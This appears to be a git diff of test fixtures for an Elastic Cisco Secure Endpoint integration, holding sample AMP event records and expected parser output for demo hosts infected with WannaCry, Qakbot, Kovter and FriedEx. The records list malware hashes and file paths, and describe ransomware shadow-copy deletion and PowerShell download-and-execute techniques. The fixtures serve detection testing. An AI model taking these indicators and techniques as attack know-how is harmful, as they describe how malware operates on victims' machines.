+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583840597369422000,"timestamp":1610621973,"timestamp_nanoseconds":231000000,"date":"2021-01-14T10:59:33+00:00","event_type":"Malicious Activity Detection","event_type_id":1090519105,"detection":"W32.MAP.Ransomware.rewrite","detection_id":"6583840593074454529","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"mscorsvw.exe","file_path":"C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\mscorsvw.exe","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0","sha1":"c78f4c22dd195a1791472a2c271a0c85b53900d9","md5":"75a758a0c5cea48c9922d64a113d0f9d"},"parent":{"process_id":480,"disposition":"Clean","file_name":"services.exe","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536","sha1":"ff658a36899e43fec3966d608b4aa4472de7a378","md5":"71c85477df9347fe8e7bc55768473fca"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6701398782847286000,"timestamp":1610621970,"timestamp_nanoseconds":182000000,"date":"2021-01-14T10:59:30+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621970,"start_date":"2021-01-14T10:59:30+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"file:///C%3A/Windows/SysWOW64/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Malicious","identity":{"sha256":"90b63fbdde1b1aa7295e6cbe9ab7726792f8829eb53f2327f8a9cf109054f2a0"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136036637603000,"timestamp":1610621707,"timestamp_nanoseconds":260000000,"date":"2021-01-14T10:55:07+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621707,"start_date":"2021-01-14T10:55:07+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"file:///C%3A/Windows/system32/cmd.exe","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"},"parent":{"disposition":"Clean","identity":{"sha256":"a86d6a6d1f5a0efcd649792a06f3ae9b37158d48493d2eca7f52dcc1cb9b6536"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066250000100,"timestamp":1610621237,"timestamp_nanoseconds":250000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1476905066228000300,"timestamp":1610621237,"timestamp_nanoseconds":228000000,"date":"2021-01-14T10:47:17+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610621237,"start_date":"2021-01-14T10:47:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Command_Line_Arguments_Kovter","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"b6:9c:d0:89:b8:66"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa"},"parent":{"disposition":"Clean","identity":{"sha256":"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":758000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411425813945647105","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411425813945647000,"timestamp":1610620426,"timestamp_nanoseconds":742000000,"date":"2021-01-14T10:33:46+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.12081E6CA3-95.SBX.TG","detection_id":"6411425813945647106","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"AySxs.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Documents\\AySxs.exe","identity":{"sha256":"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837"}}}} \ No newline at end of file diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json index 67f760bb316..b22bbab8b1f 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp7.log-expected.json @@ -18,7 +18,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -28,8 +28,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965480188Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.388856300Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":646000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204897366867970\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225558,\"description\":\"Delete pending\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -49,7 +49,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -99,7 +99,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, @@ -116,8 +116,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:43.965485160Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":459000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204901661835279\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:55.388859800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204901661835000,\"timestamp\":1610629577,\"timestamp_nanoseconds\":459000000,\"date\":\"2021-01-14T13:06:17+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Ransom:Gen.20gl.1201\",\"detection_id\":\"6419204901661835279\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -139,7 +139,7 @@ } ], "connector_guid": "test_connector_guid", - 